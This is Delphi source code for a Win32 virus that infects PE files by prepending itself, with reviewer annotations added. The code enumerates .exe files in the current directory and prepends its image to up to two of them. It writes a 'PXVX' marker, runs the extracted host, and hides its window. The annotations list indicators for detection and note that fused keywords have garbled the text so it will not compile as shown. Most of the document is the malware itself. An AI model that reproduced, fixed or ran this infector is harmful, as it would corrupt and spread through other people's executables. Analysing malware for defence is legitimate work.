感染PE文件源码

{ ===== Reviewer annotation (comments only; no code token changed) =====
  This listing is a self-replicating, prepending Win32 PE file infector written in
  Delphi / Object Pascal. It copies the first virus_size bytes of its own image in
  front of other *.exe files in the current directory, marks them, and drops
  temporary files there. Do NOT compile or run it outside an isolated, disposable
  analysis VM with no network or shared folders.
  The text as captured has lost its original line breaks: several keywords are fused
  to the following identifier (e.g. "usesSysUtils", "beginFSnapshotHandle",
  "TRUEelse", "repeatif") and each "//-----" banner comment now swallows the rest of
  its physical line, so the page will not compile as shown. That garbling is left
  in place on purpose; the annotations below only describe what the code does.
  Host-based indicators visible in the code: the 4-byte marker 'PXVX' written into
  victims, temporary files host.exe / virus.dat / victim.dat created in the working
  directory, process enumeration via CreateToolhelp32Snapshot, ShellExecute of
  host.exe, FindWindow/ShowWindow(SW_HIDE) on its own path, and the hard-coded
  carrier size virus_size = 44544. }
program XX;{$APPTYPE CONSOLE}usesSysUtils,Windows,ShellApi,TlHelp32;//-----------------------DETERMINE PROCESS EXISTANCE-----------------------------{ process_exists: walks a CreateToolhelp32Snapshot process list and returns True if any entry's szExeFile (the full string or its ExtractFileName) equals exeFileName, compared case-insensitively via UpperCase. The snapshot handle is closed before returning. Used by exec_host below to wait for the dropped host.exe to exit. }function process_exists(exeFileName: string): Boolean;varContinueLoop: BOOL;FSnapshotHandle: THandle;FProcessEntry32: TProcessEntry32;beginFSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);FProcessEntry32.dwSize := SizeOf(FProcessEntry32);ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);Result := False;while Integer(ContinueLoop) <> 0 dobegin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then begin Result := True; end; ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);end;CloseHandle(FSnapshotHandle);end;//-----------------------CHECK FILE FOR INFECTION------------------------{ check_infected: opens the file read-only, reads it 2 bytes at a time until the pair equals 'PE' or the counter i reaches size, then seeks to PE_Header+$4C, reads 4 bytes and returns True iff they are 'PXVX' (the infection marker). Note PE_Header holds the 1-based count of 2-byte reads at which 'PE' was first seen, not a byte offset, so the marker position is not the PE header's file offset - confirm against a real sample before using this position in a detection or disinfection rule. CreateFile/ReadFile results are never checked. }function check_infected(hndl:string;size:longint):boolean;var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char;beginhndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);i:=0; PE_Header:=0;repeati:=i+1;ReadFile(hndl2,buf,SizeOf(buf),NBR,0);if buf='PE' then PE_Header:=i;until (i=size) or (PE_Header<>0);SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN);ReadFile(hndl2,sign,SizeOf(sign),NBR,0);if sign='PXVX' then check_infected:=TRUEelse check_infected:=FALSE;CloseHandle(hndl2);end;//--------------------WRITE VIRUS SIGN----------------------------------------------{ write_sign: performs the same 2-byte 'PE' scan as check_infected, closes the file, reopens it with GENERIC_WRITE and overwrites 4 bytes at the same computed position (PE_Header+$4C) with 'PXVX'. This is an in-place overwrite of existing victim bytes, not an append, so the victim is damaged beyond the prepended image. No API result is checked. }procedure write_sign(hndl:string;size:longint);var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char;beginsign[1]:='P'; sign[2]:='X'; sign[3]:='V'; sign[4]:='X';i:=0; PE_Header:=0;hndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);repeati:=i+1;ReadFile(hndl2,buf,SizeOf(buf),NBR,0);if buf='PE' then PE_Header:=i;until (i=size) or 
(PE_HEADER<>0);CloseHandle(hndl2);hndl2:=CreateFile(pchar(hndl),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN);WriteFile(hndl2,sign,SizeOf(sign),NBR,0);CloseHandle(hndl2);end;//--------------------EXECUTE HOST FILE-----------------------------------------{ exec_host: ShellExecute('open') on the given path, then sleeps 1 s per iteration until process_exists reports no process of that name. The only caller passes 'host.exe', so the infector blocks until the extracted host program has exited. }procedure exec_host(hndl:string);beginShellExecute(0,'open',pchar(hndl),nil,nil,SW_SHOWNORMAL);repeatsleep(1000);until process_exists(hndl)=FALSE;end;//---------------------LOAD VIRUS---------------------------------------------{ load_virus: copies the first virus_size bytes of hndl (callers pass paramstr(0), i.e. the running image) into a freshly created 'virus.dat' in the current directory, one byte per ReadFile/WriteFile pair. }procedure load_virus(hndl:string;virus_size:longint);var buf:char; i:integer; vir_hndl,tmp_hndl,NBR:dword;begintmp_hndl:=CreateFile(pchar('virus.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);for i:=1 to virus_size do beginReadFile(vir_hndl,buf,SizeOf(buf),NBR,0);WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vir_hndl);CloseHandle(tmp_hndl);end;//---------------------LOAD HOST----------------------------------------------{ load_host: copies host_size bytes starting at file offset virus_size of hndl into a freshly created 'host.exe' in the current directory, i.e. recovers the original program that the infector carries behind its own image. }procedure load_host(hndl:string;virus_size,host_size:longint);var i:integer; buf:char; vir_hndl,tmp_hndl,NBR:dword;begintmp_hndl:=CreateFile(pchar('host.exe'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);SetFilePointer(vir_hndl,virus_size,0,FILE_BEGIN);for i:=1 to host_size do beginReadFile(vir_hndl,buf,SizeOf(buf),NBR,0);WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vir_hndl);CloseHandle(tmp_hndl);end;//--------------------------PREPEND---------------------------------------------{ prepend: backs the victim up to 'victim.dat', reopens the victim from offset 0, writes virus_size bytes from the virus file followed by the saved victim bytes, then SetEndOfFile. Result on disk: victim = infector image + original victim, so the infector's PE headers now come first. Byte-at-a-time copy; no API result is checked. }procedure prepend(victim,virus:string;virus_size,victim_size:longint);var buf:char; i:integer; 
vir_hndl,vic_hndl,NBR,target_hndl:dword;beginvir_hndl:=CreateFile(pchar(virus),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);for i:=1 to victim_size do beginReadFile(target_hndl,buf,SizeOf(buf),NBR,0);WriteFile(vic_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vic_hndl);CloseHandle(target_hndl);target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);for i:=1 to virus_size do beginReadFile(vir_hndl,buf,SizeOf(buf),NBR,0);WriteFile(target_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vir_hndl);for i:=1 to victim_size do beginReadFile(vic_hndl,buf,SizeOf(buf),NBR,0);WriteFile(target_hndl,buf,SizeOf(buf),NBR,0);end;CloseHandle(vic_hndl);SetEndOfFile(target_hndl);CloseHandle(target_hndl);end;//------------------------DELETE TMP FILES--------------------------------{ delete_junk: removes the three dropped temporary files from the current directory. }procedure delete_junk;beginDeleteFile(pchar('host.exe'));DeleteFile(pchar('virus.dat'));DeleteFile(pchar('victim.dat'));end;//--------------------------MAIN VIRUS--------------------------------------{ main program. virus_size is the hard-coded byte length of the compiled infector; any bytes beyond it in the running image are treated as the carried host. }const virus_size=44544;var over,exec_flag:boolean; host_size:longint; n:dword; old:string; FileSize:LongWord; target,sr:tsearchrec; Inf_counter:integer;beginShowWindow(FindWindow(nil,pchar(paramstr(0))),SW_HIDE);{ hides the window whose caption equals its own path (FindWindow result unchecked) }Inf_counter:=2;{ at most two files are infected per run } over:=FALSE;n:=FindFirst(paramstr(0),faAnyFile,sr);FileSize:=sr.size;{ own on-disk size; compared with virus_size to tell bare infector from infected host }FindClose(n);exec_flag:=TRUE;host_size:=FileSize-virus_size;{ candidates: every *.exe in the current directory, itself excluded }FindFirst('*.exe',faAnyFile,target);if target.name=ExtractFilename(paramstr(0)) then 
FindNext(target);{ loop over candidates that are not itself, not already marked 'PXVX', and not the dropped host.exe }repeatif (target.name<>ExtractfileName(paramstr(0))) and (check_infected(target.name,target.size)=FALSE) and (target.name<>'host.exe') thenbeginif virus_size<>FileSize then beginhost_size:=FileSize-virus_size;{ branch 1: running as an infected host (image larger than virus_size): extract virus.dat; on the first pass also extract and run the carried host, blocking until it exits; then prepend. write_sign is NOT called on this path. }load_virus(paramstr(0),virus_size);if exec_flag=TRUE then beginload_host(paramstr(0),virus_size,host_size);exec_host('host.exe');end;exec_flag:=FALSE;prepend(target.name,'virus.dat',virus_size,target.size);Inf_counter:=Inf_counter-1;endelse beginload_virus(paramstr(0),virus_size);{ branch 2: running as the bare infector (image size equals virus_size): prepend, then write the 'PXVX' marker into the victim. }prepend(target.name,'virus.dat',virus_size,target.size);write_sign(target.name,target.size);Inf_counter:=Inf_counter-1;exec_flag:=FALSE;endend;{ FindNext's return value is ignored; the loop ends when the name stops changing or the infection budget is spent }old:=target.name;FindNext(target);if target.name=old then over:=TRUE;until (Inf_counter=0) or (over=TRUE);{ if a host is attached but was never launched (no eligible victim found), extract and run it now }if (virus_size<>FileSize) and (exec_flag=TRUE) then beginload_host(paramstr(0),virus_size,host_size);exec_host('host.exe');end;delete_junk;ExitProcess(0);end.